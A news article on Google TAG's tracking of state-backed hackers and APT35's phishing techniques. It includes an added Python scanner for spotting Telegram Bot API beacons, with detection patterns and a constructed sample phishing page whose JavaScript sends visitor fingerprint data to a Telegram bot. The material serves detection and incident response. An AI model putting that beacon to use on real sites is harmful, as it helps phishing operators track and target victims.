15 October 2021

Google says it tracks over 270 state-backed threat actors from over 50 countries


The Google Threat Analysis Group (TAG) says it is tracking more than 270 government-backed threat actors from over 50 countries, engaged in disinformation campaigns, cyber-espionage, or financially motivated cybercrime.

In a new blog post, TAG’s Ajax Bash revealed that so far in 2021 the team has sent more than 50,000 warnings to customers about state-sponsored phishing or malware attempts. That is a 33% increase over the same period in 2020, driven largely by the blocking of “an unusually large campaign” from the Russia-linked threat actor known as APT28 or Fancy Bear.

One of the most notable campaigns TAG disrupted this year was run by the Iranian threat actor APT35 (aka Charming Kitten, Phosphorus, or Newscaster), known for phishing attacks against high-risk users.

Earlier operations by the group used compromised websites to host a phishing kit that harvested credentials for platforms such as Gmail, Hotmail, and Yahoo. The group also uploaded a malicious VPN app to the Google Play Store that, once installed, could be used to steal sensitive information from the infected device, including call logs, text messages, contacts, and location data.

The group also adopted a novel technique that uses Telegram for operator notifications.

“The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, user agent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram and they have taken action to remove it,” TAG explained.
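The beacon TAG describes leaves a recognisable footprint in the page itself: a call to `api.telegram.org/bot<token>/sendMessage` alongside the browser calls that gather the visitor data. The scanner below is an added example written for this page, not TAG’s tooling or anything from the kit; it runs over fetched HTML or JavaScript (from a crawler, proxy log or sandbox capture) and pulls out the bot token, the Bot API method, the destination `chat_id`, and which fingerprinting calls feed the payload. It also joins split string literals (`"abc" + "def"`) first, since kits commonly break the token or hostname across literals to dodge a plain grep. The two sample pages, the token and the chat ID are constructed for the example.

```python
"""Static scan of web content for Telegram Bot API beacons.

Added example for this page; not code from Google TAG or from the
phishing kit it describes. All sample pages, tokens and chat IDs are
constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Telegram bot tokens look like "<numeric bot id>:<~35-char secret>".
# The Bot API method is captured too; operators are not limited to sendMessage.
BOT_CALL = re.compile(
    r"https?://api\.telegram\.org/bot"
    r"(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,50})/(?P<method>[A-Za-z]+)"
)
# chat_id may arrive as a query parameter, form field or JSON key.
# A leading "-" denotes a channel/supergroup, "@name" a public channel.
CHAT_ID = re.compile(r"chat_id[\s=:\"',]{0,5}(?P<chat>-?\d{5,20}|@[A-Za-z0-9_]{5,32})")
# Browser calls that typically supply the exfiltrated visitor details.
FINGERPRINT_HINTS = (
    "navigator.userAgent",
    "navigator.language",
    "Intl.DateTimeFormat",
    "document.referrer",
)
# Matches the `" + "` between two adjacent string literals so they can be joined.
CONCAT = re.compile(r"""["']\s*\+\s*["']""")


@dataclass
class Finding:
    bot_id: str            # numeric part of the token; safe to put in a report
    token: str             # full token; handle as sensitive, it authenticates the bot
    method: str
    chat_id: Optional[str]
    fingerprint_hints: List[str] = field(default_factory=list)


def normalize_js(content: str) -> str:
    """Join adjacent string literals: '"ab" + "cd"' becomes '"abcd"'."""
    return CONCAT.sub("", content)


def scan_page(content: str) -> List[Finding]:
    """Return one Finding per distinct (token, method) beacon in the content."""
    text = normalize_js(content)
    hints = [h for h in FINGERPRINT_HINTS if h in text]
    chat = CHAT_ID.search(text)
    findings: List[Finding] = []
    seen = set()
    for m in BOT_CALL.finditer(text):
        key = (m["token"], m["method"])
        if key in seen:
            continue
        seen.add(key)
        findings.append(Finding(
            bot_id=m["token"].split(":", 1)[0],
            token=m["token"],
            method=m["method"],
            chat_id=chat["chat"] if chat else None,
            fingerprint_hints=hints,
        ))
    return findings


# Constructed sample 1: a credential-phishing page whose beacon splits the
# token and hostname across string literals.
PHISHING_PAGE = """<html><body>
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script>
(function () {
  var d = navigator.userAgent + " | " + navigator.language + " | " + document.referrer;
  var u = "https://api.telegram.org/bot" + "123456789:AAH" +
          "f3k9P1qLzXvB8wR2tYcN0dE4gH6jK7mQ" + "/sendMessage";
  fetch(u + "?chat_id=" + "-1001234567890" + "&text=" + encodeURIComponent(d));
})();
</script></body></html>"""

# Constructed sample 2: a benign page that links to a Telegram channel and
# reads the user agent but sends nothing to the Bot API.
BENIGN_PAGE = """<html><body><a href="https://t.me/example_channel">Join us</a>
<script>console.log(navigator.userAgent);</script></body></html>"""


if __name__ == "__main__":
    for name, page in (("phishing", PHISHING_PAGE), ("benign", BENIGN_PAGE)):
        found = scan_page(page)
        print(f"{name}: {len(found)} beacon(s)")
        for f in found:
            print(f"  bot {f.bot_id} -> {f.method} chat_id={f.chat_id} hints={f.fingerprint_hints}")
```

A hit gives a responder two things at once: the `bot_id` to pass to Telegram for takedown (the action TAG reports taking) and the `chat_id` of the channel the operator is watching. The scan only sees client-side beacons; a kit that relays the same data from its server never exposes the token in the page, so this complements rather than replaces network detection on the phishing host.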

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Bash said.

